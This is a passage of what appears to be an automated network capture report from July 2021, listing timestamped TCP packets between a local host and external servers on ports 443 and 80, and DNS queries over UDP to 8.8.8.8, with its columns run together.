                                                                                                                                                                                                          Jul 6, 2021 15:47:29.128463984 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.129404068 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.132792950 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.206334114 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.206360102 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.206374884 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.206389904 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.206568003 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.207957983 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.207982063 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.208170891 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.209760904 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.209784031 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.209795952 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.209930897 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211235046 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211256027 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211267948 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211405993 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211795092 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.211808920 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.212157011 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296006918 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296068907 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296148062 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296628952 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296658993 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.296722889 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.297914028 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.298007965 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.298192978 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.298495054 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.298542023 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.298608065 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300018072 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300056934 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300132036 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300821066 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300856113 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.300966978 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.302587986 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.302609921 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.302696943 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.383804083 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.383866072 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.383929014 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.384216070 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.384356022 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.384505987 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.385471106 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.385497093 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.385591984 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.386476994 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.386509895 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.386576891 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.387583017 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.387693882 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.387793064 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.389843941 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.389883041 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.389905930 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.389930010 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.390067101 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.392146111 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.392179966 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.392204046 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.392225981 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.392283916 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.393282890 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.393316031 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.393364906 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.394579887 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.394642115 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.394876003 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.395390987 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.395426035 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.395708084 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.396667957 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.396699905 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.396754980 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.398102999 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.472615957 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.472655058 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.474404097 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.474443913 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.474463940 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.474734068 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.475033998 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.475059032 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.475251913 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.475425959 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.475578070 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.476358891 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.476773977 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.477071047 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.478965044 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479001045 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479024887 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479047060 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479870081 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479907990 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.479959965 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.480021954 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.481091022 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.481143951 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.481223106 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.482158899 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.482198000 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.482357979 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.483149052 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.483213902 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.484009027 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.484378099 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.484406948 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.484460115 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.485743046 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.485800028 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.486746073 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.486829996 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.562473059 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.562504053 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.562526941 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.562549114 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.562644005 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.563224077 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.563250065 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.563482046 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.564359903 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.564393997 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.564466000 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.566517115 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.566592932 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.566628933 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.566660881 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.566688061 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.567634106 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.567653894 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.567709923 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.570656061 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.652020931 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.652051926 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.652066946 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.652082920 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.652226925 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.653209925 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.653234959 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.653306007 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.655178070 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.655210972 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.655278921 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.655978918 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.656008005 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.656071901 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.656665087 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.656682968 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.656734943 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.658585072 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.658607960 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.658663988 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.659204960 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.659230947 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.659923077 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.659944057 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.659991980 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.661932945 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.661983013 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.662051916 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.662281990 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.662298918 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.662342072 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.663137913 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.663160086 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.663216114 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.664226055 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.664248943 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.664304018 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.665740967 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739296913 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739334106 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739453077 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739821911 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739850998 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.739989042 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.740775108 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.741503954 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743200064 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743231058 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743251085 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743268013 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743300915 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.743974924 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.744379044 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.744409084 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.744443893 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.747309923 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.747342110 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.747395992 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.747975111 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.747996092 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.748009920 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.748027086 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.748045921 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.748065948 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.749039888 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.749079943 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.750296116 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.750318050 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.750359058 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.751542091 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.751573086 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.751609087 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.752015114 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.752041101 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.752109051 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.753213882 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.780807972 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.830118895 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.830178022 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.830215931 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.830248117 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.830475092 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.831039906 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.831199884 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.831298113 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.832837105 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.832874060 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.832954884 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.834459066 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.834491968 CEST4434917213.225.75.73192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.834568024 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.003213882 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.042654037 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.043072939 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.043440104 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.081696987 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.710551977 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.710656881 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:30.710872889 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                          Jul 6, 2021 15:47:31.834425926 CEST49172443192.168.2.2213.225.75.73
                                                                                                                                                                                                          Jul 6, 2021 15:47:31.834558964 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.107455015 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.107717037 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.107969999 CEST4916580192.168.2.22104.21.52.111
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.147277117 CEST8049165104.21.52.111192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.147458076 CEST4916580192.168.2.22104.21.52.111
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.159271002 CEST8049167172.67.146.88192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.159435034 CEST4916780192.168.2.22172.67.146.88
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.165759087 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:49:20.165935993 CEST4916680192.168.2.22172.67.194.117

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.182982922 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.243478060 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.416810989 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.477760077 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.640605927 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:20.703315973 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.398793936 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.472317934 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.495630980 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:21.553438902 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.906333923 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.965862036 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:22.974003077 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:23.040585995 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.835611105 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.898099899 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.915623903 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:24.969923973 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.036835909 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.096276999 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.111284971 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:26.166096926 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.196052074 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.251355886 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.273384094 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.328028917 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.861313105 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                          Jul 6, 2021 15:47:29.919354916 CEST53530708.8.8.8192.168.2.22
